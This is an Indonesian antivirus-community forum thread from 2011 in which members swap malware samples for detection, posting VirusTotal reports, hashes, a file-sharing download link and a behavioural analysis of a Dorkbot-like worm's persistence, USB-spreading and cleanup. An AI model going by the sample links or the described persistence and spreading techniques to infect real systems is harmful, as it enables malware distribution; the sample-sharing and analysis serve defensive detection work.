http://www.virustotal.com/file-scan/report.html?id=16c009a6932d08d61ced764a268ec93b386f58dc395c45e00a4fbb2620188563-1320219483
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada November 04, 2011, 02:19:07 PM
sampel lagi gan  <=)  :D baru dikit yg bs detek :o

VT :
http://www.virustotal.com/file-scan/report.html?id=16c009a6932d08d61ced764a268ec93b386f58dc395c45e00a4fbb2620188563-1320219483
Skrg sampel virus bro sudah banyak di kenali oleh antivirus impor, kalo bro punya banyak sampel virus yang belum terditeksi silakan kirim kembali. sebelumnya terima kasih atas partisipasinya. :)
Sorry but you are not allowed to view spoiler contents.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 04, 2011, 06:35:21 PM
sampel lagi gan  <=)  :D baru dikit yg bs detek :o

VT :
http://www.virustotal.com/file-scan/report.html?id=16c009a6932d08d61ced764a268ec93b386f58dc395c45e00a4fbb2620188563-1320219483
Skrg sampel virus bro sudah banyak di kenali oleh antivirus impor, kalo bro punya banyak sampel virus yang belum terditeksi silakan kirim kembali. sebelumnya terima kasih atas partisipasinya. :)
Sorry but you are not allowed to view spoiler contents.

Siap komandan!! ^:)^ ^:)^ nanti kalo ada lagi gw taroh dimari <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 04, 2011, 10:09:58 PM
sampel lagi gan  <=)  :D baru dikit yg bs detek :o

VT :
http://www.virustotal.com/file-scan/report.html?id=16c009a6932d08d61ced764a268ec93b386f58dc395c45e00a4fbb2620188563-1320219483
Skrg sampel virus bro sudah banyak di kenali oleh antivirus impor, kalo bro punya banyak sampel virus yang belum terditeksi silakan kirim kembali. sebelumnya terima kasih atas partisipasinya. :)
Sorry but you are not allowed to view spoiler contents.

Siap komandan!! ^:)^ ^:)^ nanti kalo ada lagi gw taroh dimari <=)
Ditunggu yah gan.. :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 10, 2011, 01:34:07 PM
agan agan momod, gw nemu virus baru nih gan. avira gw detek sebagai virus duqu gan, virus ini lagi nge-Top gan  <=) <=)

http://techno.okezone.com/read/2011/11/03/55/524328/virus-duqu-menyebar-lewat-microsoft-word

Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 10, 2011, 08:00:55 PM
agan agan momod, gw nemu virus baru nih gan. avira gw detek sebagai virus duqu gan, virus ini lagi nge-Top gan  <=) <=)

http://techno.okezone.com/read/2011/11/03/55/524328/virus-duqu-menyebar-lewat-microsoft-word


Wahh.. Agan selalu up to date ttg virus.. Salute.. +1 buat agan..  :)
Dulu pdf uda kena.. Sekarang yang paling ditakutkan yaitu Ms.Word sudah kena juga.. Mungkin edisi selanjutnya vaksin.com akan membahas tentang ini..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 10, 2011, 08:20:51 PM
hehe,,, makasih gan  :-bd ,gw juga kan maniak virus gan, ga mau kalah dong sama Mastah Ryan  :-bd. klo ada yg baru gw pasti upload dimari ya gan :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada November 10, 2011, 08:46:18 PM
hehe,,, makasih gan  :-bd ,gw juga kan maniak virus gan, ga mau kalah dong sama Mastah Ryan  :-bd. klo ada yg baru gw pasti upload dimari ya gan :D
Hehe. :D
Terima kasih ya!
Ayo kita berbagi! Share make us better! ^o^/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 11, 2011, 11:23:26 AM
gan gw ada sampel virus, namanya font-p***. virus ini pernah di bahas di Blog tangga sebelah gan (si bebek kuning)  <=) <=)

chekidot gan : http://virusindonesia.com/2011/05/24/font-p***/#more-1635
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Deny MiniDwarf pada November 11, 2011, 11:35:25 AM
gan gw ada sampel virus, namanya font-p***. virus ini pernah di bahas di Blog tangga sebelah gan (si bebek kuning)  <=) <=)

chekidot gan : http://virusindonesia.com/2011/05/24/font-p***/#more-1635
virusnya gak jalan di win 7...gak perlu pake av, defencenya win 7 langsung memblok nih virus...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 11, 2011, 11:37:34 AM
gan gw ada sampel virus, namanya font-p***. virus ini pernah di bahas di Blog tangga sebelah gan (si bebek kuning)  <=) <=)

chekidot gan : http://virusindonesia.com/2011/05/24/font-p***/#more-1635
virusnya gak jalan di win 7...gak perlu pake av, defencenya win 7 langsung memblok nih virus...
oh ya gan ??? ,tapi balik lg ke yg tadi.. masih bnyak di indonesia yg pake Win XP  ;>
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Deny MiniDwarf pada November 11, 2011, 11:39:39 AM
gan gw ada sampel virus, namanya font-p***. virus ini pernah di bahas di Blog tangga sebelah gan (si bebek kuning)  <=) <=)

chekidot gan : http://virusindonesia.com/2011/05/24/font-p***/#more-1635
virusnya gak jalan di win 7...gak perlu pake av, defencenya win 7 langsung memblok nih virus...
oh ya gan ??? ,tapi balik lg ke yg tadi.. masih bnyak di indonesia yg pake Win XP  ;>


beneran, coba aja kalo gak percaya, tapi anehnya avg adem ayem aja tuh, gak ribut. apa karena gak running y?...(kalu masalahnya yang tadi jangan dibahas disini..di topik sebelumnya aja, ntar dikira junker :D)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 11, 2011, 01:15:36 PM
karna gw pake XP gan jd gak ngerasa :D, ga running ya iya juga sih gan,avg ente diem aja ya. tapi avira gw langsung teriak gan  ;D

hasil VT utk file setup50045:
34/ 43 (79.1%)
http://www.virustotal.com/file-scan/report.html?id=a91de16bb0a236a05fdb5edd4f14b0179f6e53cf953cbfb09d6582b73ca5e6a4-1320991270
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada November 11, 2011, 01:24:01 PM
Benar-benar tidak jalan atau triknya?
(https://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-ash4/386483_1957047904850_1802317697_1329657_1653682959_n.jpg)
Source => https://www.facebook.com/photo.php?fbid=1957047904850&set=a.1097549057916.13849.1802317697&type=1

Padahal jalan, menular ke FD =>
(https://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-snc7/308344_1957044064754_1802317697_1329656_90319960_n.jpg) .
Source => https://www.facebook.com/photo.php?fbid=1957044064754&set=a.1097549057916.13849.1802317697&type=1
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 11, 2011, 01:41:54 PM
owhhh senangnya uplodan virus gw dianalisa sm mastah disini  <=) <=) Monggo mastah Ryan di analisa,,, gw sebagai Calon Mastah sih nyimak aja deh,, ;D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada November 11, 2011, 01:48:50 PM
owhhh senangnya uplodan virus gw dianalisa sm mastah disini  <=) <=) Monggo mastah Ryan di analisa,,, gw sebagai Calon Mastah sih nyimak aja deh,, ;D
Hehe, oke, terima kasih.

Tadi kan sudah saya jalankan tuh, dan menular ke FD, terus saya penasaran nih menjalankan ulang, nah tidak menular lagi di FD, hmm..., masih tanda tanya ini. Hmm....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada November 11, 2011, 05:41:32 PM
@ponco wiibowo

Ada setok virus baru ngk ??? tapi yang belum terditeksi antivirus impor atapun lokal ya. :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Alif de Hunter! pada November 11, 2011, 07:18:47 PM
gan2 kalo virus yg didalem zip bisa menginfeksi, nyebar atau merusak gak sih??  ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 11, 2011, 07:37:50 PM
gan2 kalo virus yg didalem zip bisa menginfeksi, nyebar atau merusak gak sih??  ^:)^
Tidak bisa, kecuali jika agan mengeksekusinya secara tersendiri dari dalam file zip tsb. File virus yg dikompres lebih aman daripada yang belum dikompres karena bisa menghindari eksekusi langsung (double click). :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Alif de Hunter! pada November 11, 2011, 08:26:35 PM
test fake virus atau mungkin bukan virus  :D
tenang aja ga nginfeksi,merusak dll ... , coba cari apa yg diganti ..  :P
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 11, 2011, 08:35:10 PM
@ponco wiibowo

Ada setok virus baru ngk ??? tapi yang belum terditeksi antivirus impor atapun lokal ya. :D
owww ada gan ,stok virus gw selalu uptodate. tapi banyaknya virus luar, soalnya klo virus lokal agak jarang blakaangan ini. paling banyak itu virus luar yg banyak beredar diindonesia gan  :D :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Alif de Hunter! pada November 11, 2011, 08:38:27 PM
@ponco wiibowo

Ada setok virus baru ngk ??? tapi yang belum terditeksi antivirus impor atapun lokal ya. :D
owww ada gan ,stok virus gw selalu uptodate. tapi banyaknya virus luar, soalnya klo virus lokal agak jarang blakaangan ini. paling banyak itu virus luar yg banyak beredar diindonesia gan  :D :D
Mintak donk gan buat koleksi  :3  :-bd  :D  :)  ^-^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 11, 2011, 08:38:57 PM
test fake virus atau mungkin bukan virus  :D
tenang aja ga nginfeksi,merusak dll ... , coba cari apa yg diganti ..  :P
Mengganti registered owner dan register organization tohh? :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Alif de Hunter! pada November 11, 2011, 08:43:19 PM
@kiamhu  ;D hahahahha ... hebat  :-bd ,  :-[ lama ga nyari nya ??  :-\
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 11, 2011, 08:50:12 PM
@kiamhu  ;D hahahahha ... hebat  :-bd ,  :-[ lama ga nyari nya ??  :-\
Gak lama c.. Soalnya ane pake cara curang, yaitu melihat isi commandnya, bukan menunggu hasilnya..  ;D ;D
Ooppss terlalu jujur..  :P
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Alif de Hunter! pada November 11, 2011, 08:54:55 PM
jiah curang  ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 11, 2011, 09:05:03 PM
jiah curang  ;)
Piss gan.. :D
Makanya gan.. Kalo mao upload, lewat file exe ato com aja biar gak dibaca dengan mudah..  ;D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Alif de Hunter! pada November 11, 2011, 09:08:38 PM
iya2 nnti ane bikin atu lagi  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 11, 2011, 09:09:47 PM
@ki@mhu: nanti w upload yg agak ganas ya virusnya, nanti ente analisa ya. sebagai calon mastah nanti gw ikutan pantau sekaligus bantuin analisa ya gan  ;D <=)

@aalifkudo: nanti gw upload dimari ya gan  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Alif de Hunter! pada November 11, 2011, 09:49:49 PM
@ki@mhu: nanti w upload yg agak ganas ya virusnya, nanti ente analisa ya. sebagai calon mastah nanti gw ikutan pantau sekaligus bantuin analisa ya gan  ;D <=)

@aalifkudo: nanti gw upload dimari ya gan  :-bd

Sip2
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 11, 2011, 10:32:13 PM
@ki@mhu: nanti w upload yg agak ganas ya virusnya, nanti ente analisa ya. sebagai calon mastah nanti gw ikutan pantau sekaligus bantuin analisa ya gan  ;D <=)

@aalifkudo: nanti gw upload dimari ya gan  :-bd
Wokehh.. Siipp... :)
Kbtulan hobi kita sama.. :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hatjulhasbi pada November 15, 2011, 01:33:06 PM
ini ada virus gan helppp
http://www.mediafire.com/?acccretyvpyn77z
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada November 15, 2011, 02:40:20 PM
ini ada virus gan helppp
http://www.mediafire.com/?acccretyvpyn77z
Itu virus yang ada di FB, masih termasuk virus baru, masih susah untuk didapati hasil analisa selanjutnya.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rh354 pada November 15, 2011, 04:14:57 PM
ajarin main gituan donk om
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hatjulhasbi pada November 15, 2011, 05:12:37 PM
ini ada virus gan helppp
http://www.mediafire.com/?acccretyvpyn77z
Itu virus yang ada di FB, masih termasuk virus baru, masih susah untuk didapati hasil analisa selanjutnya.

udah bisa di deteksi eset sma avira.. tapi gak tau bisa tuntas apa gak, alnya lagi proses scan :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada November 15, 2011, 07:10:08 PM
ini ada virus gan helppp
http://www.mediafire.com/?acccretyvpyn77z
barusan ane coba inject kompi ane dengan virus ini.
Esset menangkap sortcut nya sebagai dorkboot d.worm,tapi file induknya masih belum dapat dideteksi oleh esset.
barusan ane coba scan file induknya dengan esset tapi lucunya esset mendeteksi 0 file,alias tidak mendeteksi satu file pun.padahal jelas-2 ane scan 1 file virus itu.

virus ini membuat self extractor cabinet di start up folder. C/user/user profile/app data/roaming/microsoft/windows/start menu/progam/startup ( dengan nama newmoon17.exe dan satu file desktop.ini ==> file terlampir dengan nama startup.rar )
 terditeksi esset sebagai win32/injektor.ksw.trojan
dengan nama yang sama pula juga ada di %temp%

ketika ane coba buka newmoon17.exe dengan winrar terlihat signatur sbb

Sorry but you are not allowed to view spoiler contents.

membuat folder di %appdata% sesuai signaturnya tsb dengan nama foldernya kakao3
didalam folder kakao3 terdapat 2 buah tikus lagi (new.exe dan fuckHDZSDP.exe )
sample attachments ==> kakao3 masih lolos dari deteksi esset smart security 5 abis ini mau ane submit ke esset


membuat anakan virus lagi di %appdata% tapi disini nama tikusnya bisa random.
sample attachments ==> Roaming.rar

menginfeksi flasdisk dengan metode menghiden semua folder dan file asli di flasdisk dan membuat file *.ink
sortcut dengan nama file asli yang dihiden tsb.termasuk juga autorun.inf nya smadav.
dan juga membuat folder recycler beserta dua ekor tikus didalamnya
sample ==>recycler.rar

menginfeksi cmd.exe di windows system 32.dan semua sortcutnya itu juga menuju ke cmd.32 tsb.

untuk pembersihan system yang sudah terinfeksi oleh varian dorkboot ini hapuslah folder-2 induk tikus diatas
terutama folder kakao3 di %appdata% kill dulu proses yang jalan dengan smadav ==> ganti folder yang telah dihapus tadi dengan text dokumen dan rename text dokumen tadi dengan nama kakao3 tanpa extensi .txt
rename cmd.exe di windows/system32 menjadi cmd.txt ( setelah scaning kembalikan lagi seperti semual )
supaya file sortcut di flasdisk tidak dapat bekerja kalau cmd.exenya ini kita rename.

booting compi via safe mode dan lakukan full scan semua drive dengan esset. ( sori bukan promosi soalnya ane percobaannya dengan esset smart security uptodate )

setelah selesai cek lagi folder-2 tempat virus tadi berada masih atau tidak virusnya.

maaf kalau belepotan ngomongnya semoga bermanfaat ;D ;D ;D


Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 15, 2011, 07:36:43 PM
ini ada virus gan helppp
http://www.mediafire.com/?acccretyvpyn77z
barusan ane coba inject kompi ane dengan virus ini.
Esset menangkap sortcut nya sebagai dorkboot d.worm,tapi file induknya masih belum dapat dideteksi oleh esset.
barusan ane coba scan file induknya dengan esset tapi lucunya esset mendeteksi 0 file,alias tidak mendeteksi satu file pun.padahal jelas-2 ane scan 1 file virus itu.

virus ini membuat self extractor cabinet di start up folder. C/user/user profile/app data/roaming/microsoft/windows/start menu/progam/startup ( dengan nama newmoon17.exe dan satu file desktop.ini ==> file terlampir dengan nama startup.rar )
 terditeksi esset sebagai win32/injektor.ksw.trojan
dengan nama yang sama pula juga ada di %temp%

ketika ane coba buka newmoon17.exe dengan winrar terlihat signatur sbb

Sorry but you are not allowed to view spoiler contents.

membuat folder di %appdata% sesuai signaturnya tsb dengan nama foldernya kakao3
didalam folder kakao3 terdapat 2 buah tikus lagi (new.exe dan fuckHDZSDP.exe )
sample attachments ==> kakao3 masih lolos dari deteksi esset smart security 5 abis ini mau ane submit ke esset


membuat anakan virus lagi di %appdata% tapi disini nama tikusnya bisa random.
sample attachments ==> Roaming.rar

menginfeksi flasdisk dengan metode menghiden semua folder dan file asli di flasdisk dan membuat file *.ink
sortcut dengan nama file asli yang dihiden tsb.termasuk juga autorun.inf nya smadav.
dan juga membuat folder recycler beserta dua ekor tikus didalamnya
sample ==>recycler.rar

menginfeksi cmd.exe di windows system 32.dan semua sortcutnya itu juga menuju ke cmd.32 tsb.

untuk pembersihan system yang sudah terinfeksi oleh varian dorkboot ini hapuslah folder-2 induk tikus diatas
terutama folder kakao3 di %appdata% kill dulu proses yang jalan dengan smadav ==> ganti folder yang telah dihapus tadi dengan text dokumen dan rename text dokumen tadi dengan nama kakao3 tanpa extensi .txt ( atau download attachments di bawah.

rename cmd.exe di windows/system32 menjadi cmd.txt supaya ( setelah scaning kembalikan lagi seperti semual )
file sortcut di flasdisk tidak dapat bekerja kalau cmd.exenya ini kita rename.

booting compi via safe mode dan lakukan full scan semua drive dengan esset. ( sori bukan promosi soalnya ane percobaannya dengan esset smart security uptodate )

setelah selesai cek lagi folder-2 tempat virus tadi berada masih atau tidak virusnya.

maaf kalau belepotan ngomongnya semoga bermanfaat ;D ;D ;D



Wahh.. Salut buat mastahh.. :-bd
Ane mau tanya ni.. Mohon bimbingannya.. ^:)^
Sampel file yang diupload itu ekstensinya .dav. Gimana cara menjalankannya yah?
Terus yang newmoon17.exe gimana cara buka dengn winrar yah?

Terima kasih sebelumnya.. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada November 15, 2011, 07:42:10 PM
Wahh.. Salut buat mastahh.. :-bd
Ane mau tanya ni.. Mohon bimbingannya.. ^:)^
Sampel file yang diupload itu ekstensinya .dav. Gimana cara menjalankannya yah?
Terus yang newmoon17.exe gimana cara buka dengn winrar yah?

Terima kasih sebelumnya.. :)
file yang diupload itu ekstensinya .dav. Gimana cara menjalankannya yah tinggal copy filenya ke C/[Smad-Cage] ==> jalankan smadav/quarantine/pilih restrore to ( pilih lokasi restorenya )

cara buka newmoon17.exe nya cuman ane rename menjadi newmoon17.rar  :D :D ( double klik )
maaf gan soalnya ane nggak bisa coding jadi pake cara manual  :D :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 15, 2011, 07:54:17 PM
Kutip
file yang diupload itu ekstensinya .dav. Gimana cara menjalankannya yah tinggal copy filenya ke C/[Smad-Cage] ==> jalankan smadav/quarantine/pilih restrore to ( pilih lokasi restorenya )

cara buka newmoon17.exe nya cuman ane rename menjadi newmoon17.rar    ( double klik )
maaf gan soalnya ane nggak bisa coding jadi pake cara manual   

Iyahh.. Da berhasil dijalankan.. <=)
Kalo buka dengan winzip koq gak terbaca yahh? Apakah ini saatnya bagi ane utk migrasi ke winrar? ;D
Apakah virus ini juga bermain2 di registry?
Jika cmd ini terinfeksi, berarti harus menunggu perintah AV utk merepairnya yah? :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada November 15, 2011, 07:59:56 PM
regystry standart yang selalu dibuat oleh sebagian besar virus
membuat new value di HKLM/sofware/microsoft/windows/current fersion/run/.... yang menjalankan file virus yang di roaming
selebihnya ane nggak cek karena ini kompi keburu ane boot thawed.  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada November 15, 2011, 09:06:44 PM
ajarin main gituan donk om
ih..om genit deh haha..., ane juga mau dong diajarin... ;D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 15, 2011, 09:29:09 PM
regystry standart yang selalu dibuat oleh sebagian besar virus
membuat new value di HKLM/sofware/microsoft/windows/current fersion/run/.... yang menjalankan file virus yang di roaming
selebihnya ane nggak cek karena ini kompi keburu ane boot thawed.  :D
Terus gimana caranya agar kita bisa liat path dari sebuah virus shorcut? Kalo shorcut biasa kan gampang.. ;D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada November 15, 2011, 10:06:44 PM
Terus gimana caranya agar kita bisa liat path dari sebuah virus shorcut? Kalo shorcut biasa kan gampang.. ;D
kan sama saja gan,
klik kanan properties di bagian targetnya kan sudah ada target path nya
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 15, 2011, 10:56:41 PM
Terus gimana caranya agar kita bisa liat path dari sebuah virus shorcut? Kalo shorcut biasa kan gampang.. ;D
kan sama saja gan,
klik kanan properties di bagian targetnya kan sudah ada target path nya

Liat target pathnya di bagian tab "shorcut" kan? Di tempat ane pake XP SP3, tab "shorcutnya" kagak ada utk shorcut virus. Kalo utk shorcut biasa baru ada. ???
Trims uda dibimbing.. ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: :Pak:Bos: pada November 16, 2011, 05:49:19 AM
dimana sajakah saya bisa upload virus ke smadav?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada November 16, 2011, 07:38:23 AM
dimana sajakah saya bisa upload virus ke smadav?
upload aja sample virus ke sini:
http://smadav.net/index.php?page=upload
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 16, 2011, 09:47:25 AM
wo wow,,,wow,, ketinggalan berita nih gw. ada virus baru ya gan? ??? <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: :Pak:Bos: pada November 16, 2011, 02:38:55 PM
selain disitu dimana lagi gan?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 16, 2011, 02:41:17 PM
selain disitu dimana lagi gan?
Di trit ini juga bisa gan.. Biar dianalisis rame2.. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada November 16, 2011, 03:50:31 PM
Terus gimana caranya agar kita bisa liat path dari sebuah virus shorcut? Kalo shorcut biasa kan gampang.. ;D
kan sama saja gan,
klik kanan properties di bagian targetnya kan sudah ada target path nya

Liat target pathnya di bagian tab "shorcut" kan? Di tempat ane pake XP SP3, tab "shorcutnya" kagak ada utk shorcut virus. Kalo utk shorcut biasa baru ada. ???
Trims uda dibimbing.. ;)
:D
Itu yang dinamakan ShortCut Exploit, tidak ada tab untuk Targetnya, tapi sebenarnya masih ada kok path file yang akan dieksekusi, hanya saja tidak senampak yang ada tab Target itu. ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 16, 2011, 07:55:09 PM
Terus gimana caranya agar kita bisa liat path dari sebuah virus shorcut? Kalo shorcut biasa kan gampang.. ;D
kan sama saja gan,
klik kanan properties di bagian targetnya kan sudah ada target path nya

Liat target pathnya di bagian tab "shorcut" kan? Di tempat ane pake XP SP3, tab "shorcutnya" kagak ada utk shorcut virus. Kalo utk shorcut biasa baru ada. ???
Trims uda dibimbing.. ;)
:D
Itu yang dinamakan ShortCut Exploit, tidak ada tab untuk Targetnya, tapi sebenarnya masih ada kok path file yang akan dieksekusi, hanya saja tidak senampak yang ada tab Target itu. ;)
Ada gak caranya utk liat pathnya? Ajari yah mastah Ryan... ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 17, 2011, 10:46:42 AM
makin ngaco aja ya gan virus yg berasal dr Facebook ;D ;D pic nya porno bgt gan, baru aja tadi gw dapet gan,,, monggo di download ya gan  <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 17, 2011, 03:34:31 PM
upload lagi gan. gw dapet dari email yg masuk ke inbox gw. monggo silahkan dianalisa ya gan.. gw sertain juga file droppernya.  <=)

MD5:
Financial_Statement.EXE : 9ea5befab3fab1d19d70f8d917463d13
zxjidmw.exe : 6d6bd4c8256d75b314bdd644c1240917  


created file:

C:\Users\MasterRat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dxdiag.exe
C:\Users\MasterRat\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2WQDLV5B\vcl[1].exe
C:\Users\MasterRat\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BCLF5QTL\task[1].htm
C:\Users\MasterRat\AppData\Local\zxjidmw.exe


semoga uplodan virus gw berguna ya gan buat smadav  :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada November 17, 2011, 08:05:21 PM
@ponco udah keditek esset sebagai win32/injektor.ksw.trojan
induk virus dorkboot yang lagi naik daun  :D

edit
udah dari kemaren submit file ke esset masih blm dapat jawaban.biasanya paling lama 2X 24 jam udah dapet email balasan.
varian virus FB yang blm terdeteksi esset. yang bisa deteksi baru mcAFEE /AVG/sama drweb aja.
file ada di attachments
hasil dari virus total  http://www.virustotal.com/file-scan/report.html?id=48799960fcc61aef84fb71a1c943ee9c649440202c3952a1acc690d4f46d67a5-1321608073 (http://www.virustotal.com/file-scan/report.html?id=48799960fcc61aef84fb71a1c943ee9c649440202c3952a1acc690d4f46d67a5-1321608073)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 18, 2011, 10:39:37 PM
senangnya bisa berkontribusi untuk smadaver dengan mengirimkan sample virus :-bd. gw juga ingin membuktikan kepada 3 orang diforum ini bahwa gw ngga seperti yang di tuduhkan mereka,,,

sorry ya agak oot   <=)

@manggolo:
gw punya 5 sample sejenis,,, pic nya wanita porno. belum bnyak virus luar yg deteksi. virus varian baru dr FB ini sudah banyak menjangkiti komp. di indonesia,,,
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 18, 2011, 10:56:19 PM
Bagi tips donk dimana bisa cari sampel yang ngeri?? :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 21, 2011, 09:46:34 AM
Bagi tips donk dimana bisa cari sampel yang ngeri?? :)
ngeri maksudnya gimana ya gan ??? ??? klo menurut gw sih sampai saat ini masih Sality yg paling ngeri gan, variannya selalu muncul ;D <=)


nih gw ada Virus GoodJoy

barusan eset, mse sm kasper blum detek tuh,,,
http://www.virustotal.com/file-scan/report.html?id=3ef8651ccfefcf02386591f26f733b48df7c180e02f8e9d9ff8ca14bfd2cc702-1321842922
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 21, 2011, 10:33:02 AM
Bagi tips donk dimana bisa cari sampel yang ngeri?? :)
ngeri maksudnya gimana ya gan ??? ??? klo menurut gw sih sampai saat ini masih Sality yg paling ngeri gan, variannya selalu muncul ;D <=)


nih gw ada Virus GoodJoy

barusan eset, mse sm kasper blum detek tuh,,,
http://www.virustotal.com/file-scan/report.html?id=3ef8651ccfefcf02386591f26f733b48df7c180e02f8e9d9ff8ca14bfd2cc702-1321842922
Ngeri di sini maksudnya killer.. ;D
Sampel yg ini lumayan besar yahh..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 21, 2011, 10:45:03 AM
Bagi tips donk dimana bisa cari sampel yang ngeri?? :)
ngeri maksudnya gimana ya gan ??? ??? klo menurut gw sih sampai saat ini masih Sality yg paling ngeri gan, variannya selalu muncul ;D <=)


nih gw ada Virus GoodJoy

barusan eset, mse sm kasper blum detek tuh,,,
http://www.virustotal.com/file-scan/report.html?id=3ef8651ccfefcf02386591f26f733b48df7c180e02f8e9d9ff8ca14bfd2cc702-1321842922
Ngeri di sini maksudnya killer.. ;D
Sampel yg ini lumayan besar yahh..
oo killer maksudnya gan  ;D
dulu gw demen liat2 di wormarchive.com itu situs favorid gw gan ,sayangnya udah tutup usia tuh situs  =)) <=) ,sampel2 yg skrng dari FD tmen-temen aja gan :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 22, 2011, 02:30:10 PM
barusan ngeklik situs yg katanya WOT firefox gak baik,tapi malah gw klik,,, ehh ada file yg minta didownload  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rh354 pada November 22, 2011, 05:12:08 PM
barusan ngeklik situs yg katanya WOT firefox gak baik,tapi malah gw klik,,, ehh ada file yg minta didownload  :D
Dear Eset user,

The detection for this threat will be included in our next signature update.

about.exe - Win32/TrojanDownloader.Mebload.AN trojan
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada November 23, 2011, 06:49:10 AM
izin dunlut sampel virusnya BOzZZz,,,

buat koleksi di kompi aq,,,,

 :-bd  :-bd  :-bd  :-bd
 :D  :D  :D  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: KlinikQu pada November 23, 2011, 02:17:00 PM
barusan ngeklik situs yg katanya WOT firefox gak baik,tapi malah gw klik,,, ehh ada file yg minta didownload  :D
Dear Eset user,

The detection for this threat will be included in our next signature update.

about.exe - Win32/TrojanDownloader.Mebload.AN trojan


mantap agan rhesa... :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada November 24, 2011, 01:21:50 PM
izin dunlut sampel virusnya BOzZZz,,,

buat koleksi di kompi aq,,,,

 :-bd  :-bd  :-bd  :-bd
 :D  :D  :D  :D
jangan cuma izin dunlut aja dong gan,,, upload sampel virus ente dimari ya gan. dengan menyumbang sampel virus berarti agan ikut mendukung smadav gan. ok gan  :-bd <=)
Judul: Re: Re: Upload VIRUS ke Forum..
